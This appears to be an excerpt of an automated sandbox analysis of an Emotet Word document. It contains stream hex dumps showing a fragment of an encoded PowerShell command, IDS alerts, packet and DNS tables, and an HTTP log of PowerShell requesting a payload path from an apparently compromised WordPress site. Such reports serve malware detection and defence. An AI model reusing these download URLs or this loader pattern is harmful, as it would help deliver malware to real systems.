                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 80
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:80
                                Entropy:3.62455849364
                                Base64 Encoded:False
                                Data ASCII:. . 0 . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . r s h e l l - e n c o . - . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 30 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 0d 00 00 80 1a 00 00 00 1a 00 00 00 30 00 01 00 72 73 68 65 6c 6c 20 2d 65 6e 63 6f 20 b9 2d 0c 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.4236941111
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . F Y k U 1 C . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 06 00 00 80 1a 00 00 00 1a 00 00 00 30 00 fe ff 46 59 6b 55 31 43 fe ff 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                12/04/20-10:47:45.856448ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                12/04/20-10:47:47.602616ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                12/04/20-10:47:51.698552TCP1201ATTACK-RESPONSES 403 Forbidden804917176.223.26.96192.168.2.22

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 4, 2020 10:57:13.751122952 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:13.888006926 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:13.888976097 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:13.889743090 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.026762009 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142548084 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142617941 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142657995 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142697096 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142735004 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142785072 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142827034 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142846107 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.142869949 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.142899990 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.142905951 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.142911911 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.194467068 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.242218971 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.279783964 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279810905 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279825926 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279841900 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279859066 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279875994 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279894114 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279908895 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279925108 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:14.279938936 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.279983044 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.279989004 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.279993057 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.335890055 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.670815945 CET49712443192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:14.807698965 CET44349712204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:15.320363998 CET49712443192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:15.457412004 CET44349712204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:15.961234093 CET49712443192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:16.098179102 CET44349712204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:16.162493944 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:16.207510948 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.229602098 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.229698896 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.256453991 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.278558016 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.284030914 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.284099102 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.284171104 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.290517092 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.299457073 CET8049710204.11.56.48192.168.2.3
                                Dec 4, 2020 10:57:16.299721956 CET4971080192.168.2.3204.11.56.48
                                Dec 4, 2020 10:57:16.312623024 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.312828064 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.339796066 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.361938000 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373312950 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373357058 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373435020 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373436928 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.373473883 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373528004 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373537064 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.373565912 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373615980 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373630047 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.373652935 CET44349713172.67.180.202192.168.2.3
                                Dec 4, 2020 10:57:16.373714924 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:16.565228939 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:16.726388931 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.726572990 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:16.726860046 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:16.888083935 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.888173103 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.888231993 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.888263941 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.888470888 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:16.888521910 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:16.898741961 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.898792028 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:16.899030924 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:16.905827999 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:17.073168039 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:17.077004910 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:17.251267910 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:17.251332045 CET44349714103.224.212.219192.168.2.3
                                Dec 4, 2020 10:57:17.251543045 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:17.254640102 CET49714443192.168.2.3103.224.212.219
                                Dec 4, 2020 10:57:17.496340036 CET4971580192.168.2.313.248.148.254
                                Dec 4, 2020 10:57:17.512480974 CET804971513.248.148.254192.168.2.3
                                Dec 4, 2020 10:57:17.512597084 CET4971580192.168.2.313.248.148.254
                                Dec 4, 2020 10:57:17.512826920 CET4971580192.168.2.313.248.148.254
                                Dec 4, 2020 10:57:17.528791904 CET804971513.248.148.254192.168.2.3
                                Dec 4, 2020 10:57:17.651443958 CET804971513.248.148.254192.168.2.3
                                Dec 4, 2020 10:57:17.695544958 CET4971580192.168.2.313.248.148.254
                                Dec 4, 2020 10:57:17.787523031 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:17.889341116 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:17.889468908 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:17.889827013 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:17.991609097 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:17.991863966 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:17.991908073 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:17.991945982 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:17.991975069 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:17.992041111 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:17.992685080 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:17.995949984 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.036926985 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.139502048 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.142847061 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.247349024 CET44349716173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.289345026 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.324975967 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.426786900 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.426899910 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.427253008 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.529071093 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.529357910 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.529438019 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.529483080 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.529511929 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.529542923 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.529577017 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.535352945 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.537719965 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.640001059 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.642271042 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.752244949 CET44349717173.198.248.218192.168.2.3
                                Dec 4, 2020 10:57:18.804989100 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.990434885 CET49713443192.168.2.3172.67.180.202
                                Dec 4, 2020 10:57:18.990784883 CET49717443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.991493940 CET49716443192.168.2.3173.198.248.218
                                Dec 4, 2020 10:57:18.991533041 CET4971580192.168.2.313.248.148.254

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 4, 2020 10:56:58.742619038 CET5864353192.168.2.38.8.8.8
                                Dec 4, 2020 10:56:58.769593000 CET53586438.8.8.8192.168.2.3
                                Dec 4, 2020 10:56:59.829957008 CET6098553192.168.2.38.8.8.8
                                Dec 4, 2020 10:56:59.865731955 CET53609858.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:00.656380892 CET5020053192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:00.683566093 CET53502008.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:01.764890909 CET5128153192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:01.800416946 CET53512818.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:03.273947001 CET4919953192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:03.300997972 CET53491998.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:04.147469997 CET5062053192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:04.183125973 CET53506208.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:05.024797916 CET6493853192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:05.052021980 CET53649388.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:07.300939083 CET6015253192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:07.328154087 CET53601528.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:08.246231079 CET5754453192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:08.273551941 CET53575448.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:09.032865047 CET5598453192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:09.060055017 CET53559848.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:10.296904087 CET6418553192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:10.323970079 CET53641858.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:12.357574940 CET6511053192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:12.393500090 CET53651108.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:13.321188927 CET5836153192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:13.357043028 CET53583618.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:13.583811998 CET6349253192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:13.743201017 CET53634928.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:14.291563988 CET6083153192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:14.318692923 CET53608318.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:14.510873079 CET6010053192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:14.669481993 CET53601008.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:16.170830011 CET5319553192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:16.206407070 CET53531958.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:16.378762007 CET5014153192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:16.564199924 CET53501418.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:17.266761065 CET5302353192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:17.456588984 CET53530238.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:17.460306883 CET4956353192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:17.495745897 CET53495638.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:17.665402889 CET5135253192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:17.786827087 CET53513528.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:18.249912024 CET5934953192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:18.285842896 CET53593498.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:18.288636923 CET5708453192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:18.324428082 CET53570848.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:31.473206997 CET5882353192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:31.510972023 CET53588238.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:48.854052067 CET5756853192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:48.891546965 CET53575688.8.8.8192.168.2.3
                                Dec 4, 2020 10:57:48.961035013 CET5054053192.168.2.38.8.8.8
                                Dec 4, 2020 10:57:48.988471985 CET53505408.8.8.8192.168.2.3
                                Dec 4, 2020 11:01:48.564791918 CET5436653192.168.2.38.8.8.8
                                Dec 4, 2020 11:01:48.608140945 CET53543668.8.8.8192.168.2.3
                                Dec 4, 2020 11:01:51.649082899 CET5303453192.168.2.38.8.8.8
                                Dec 4, 2020 11:01:51.684720039 CET53530348.8.8.8192.168.2.3
                                Dec 4, 2020 11:01:54.677417994 CET5776253192.168.2.38.8.8.8
                                Dec 4, 2020 11:01:54.713031054 CET53577628.8.8.8192.168.2.3
                                Dec 4, 2020 11:01:54.950711966 CET5543553192.168.2.38.8.8.8
                                Dec 4, 2020 11:01:54.986514091 CET53554358.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Dec 4, 2020 10:57:13.583811998 CET192.168.2.38.8.8.80x9015Standard query (0)blockchainjoblist.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:14.510873079 CET192.168.2.38.8.8.80x2d7bStandard query (0)womenempowermentpakistan.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:16.170830011 CET192.168.2.38.8.8.80x2878Standard query (0)atnimanvilla.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:16.378762007 CET192.168.2.38.8.8.80x2189Standard query (0)yeuquynhnhai.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.266761065 CET192.168.2.38.8.8.80x5d6aStandard query (0)ww38.yeuquynhnhai.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.460306883 CET192.168.2.38.8.8.80xad9cStandard query (0)ww38.yeuquynhnhai.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.665402889 CET192.168.2.38.8.8.80x97a5Standard query (0)deepikarai.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:18.249912024 CET192.168.2.38.8.8.80xe924Standard query (0)www.deepikarai.comA (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:18.288636923 CET192.168.2.38.8.8.80x11f4Standard query (0)www.deepikarai.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Dec 4, 2020 10:57:13.743201017 CET8.8.8.8192.168.2.30x9015No error (0)blockchainjoblist.com204.11.56.48A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:14.669481993 CET8.8.8.8192.168.2.30x2d7bNo error (0)womenempowermentpakistan.com204.11.56.48A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:16.206407070 CET8.8.8.8192.168.2.30x2878No error (0)atnimanvilla.com172.67.180.202A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:16.206407070 CET8.8.8.8192.168.2.30x2878No error (0)atnimanvilla.com104.28.9.166A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:16.206407070 CET8.8.8.8192.168.2.30x2878No error (0)atnimanvilla.com104.28.8.166A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:16.564199924 CET8.8.8.8192.168.2.30x2189No error (0)yeuquynhnhai.com103.224.212.219A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.456588984 CET8.8.8.8192.168.2.30x5d6aNo error (0)ww38.yeuquynhnhai.com701602.parkingcrew.netCNAME (Canonical name)IN (0x0001)
                                Dec 4, 2020 10:57:17.456588984 CET8.8.8.8192.168.2.30x5d6aNo error (0)701602.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.456588984 CET8.8.8.8192.168.2.30x5d6aNo error (0)701602.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.495745897 CET8.8.8.8192.168.2.30xad9cNo error (0)ww38.yeuquynhnhai.com701602.parkingcrew.netCNAME (Canonical name)IN (0x0001)
                                Dec 4, 2020 10:57:17.495745897 CET8.8.8.8192.168.2.30xad9cNo error (0)701602.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.495745897 CET8.8.8.8192.168.2.30xad9cNo error (0)701602.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:17.786827087 CET8.8.8.8192.168.2.30x97a5No error (0)deepikarai.com173.198.248.218A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:18.285842896 CET8.8.8.8192.168.2.30xe924No error (0)www.deepikarai.comdeepikarai.comCNAME (Canonical name)IN (0x0001)
                                Dec 4, 2020 10:57:18.285842896 CET8.8.8.8192.168.2.30xe924No error (0)deepikarai.com173.198.248.218A (IP address)IN (0x0001)
                                Dec 4, 2020 10:57:18.324428082 CET8.8.8.8192.168.2.30x11f4No error (0)www.deepikarai.comdeepikarai.comCNAME (Canonical name)IN (0x0001)
                                Dec 4, 2020 10:57:18.324428082 CET8.8.8.8192.168.2.30x11f4No error (0)deepikarai.com173.198.248.218A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • blockchainjoblist.com
                                • ww38.yeuquynhnhai.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.349710204.11.56.4880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampkBytes transferredDirectionData
                                Dec 4, 2020 10:57:13.889743090 CET153OUTGET /wp-admin/014080/ HTTP/1.1
                                Host: blockchainjoblist.com
                                Connection: Keep-Alive
                                Dec 4, 2020 10:57:14.142548084 CET157INHTTP/1.1 200 OK
                                Date: Fri, 04 Dec 2020 09:57:13 GMT
                                Server: Apache
                                Set-Cookie: vsid=918vr3546214339725457; expires=Wed, 03-Dec-2025 09:57:13 GMT; Max-Age=157680000; path=/; domain=blockchainjoblist.com; HttpOnly
                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E503N/c9vH68vLQNGrh/X6rogosfiZpGiMypqh4jZU8iK5rJ+JO8YnYsayK1N0DLcXyZd5uyBd23CIVDhZBPng==
                                Keep-Alive: timeout=5, max=113
                                Connection: Keep-Alive
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 35 38 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 6c 6f 63 6b 63 68 61 69 6e 6a 6f 62 6c 69 73 74 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 6c 6f 63 6b 63 68 61 69 6e 6a 6f 62 6c 69 73 74 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 6c 6f 63 6b 63 68 61 69 6e 6a 6f 62 6c 69 73 74 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 4f 55 59 78 59 32 73 34 52 6e 64 4c 63 30 52 56 62 6b 51 78 61 7a 68 42 62 6a 42 43 4e 48 67 78 65 45 70 78 57 46 52 55 54 58 68 31 56 31 55 34 53 43 74 52 5a 31 6c 78 56 58 4a 53 4d 57 78 31 51 56 49 78 55 6c 6c 51 53 56 64 56 54 6a 42 74 4d 6a 64 55 5a 6b 68 4b 59 30 35 4c 51 30 49 7a 62 7a 64 52 53 6e 4a 77 59 57 74 45 63 30 38 76 57 55 4e 58 61 47 6c 4c 53 31 46 51 65 44 68 51 4f 45 6c 74 55 6d 38 30 4e 48 46 78 55 31 6b 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b
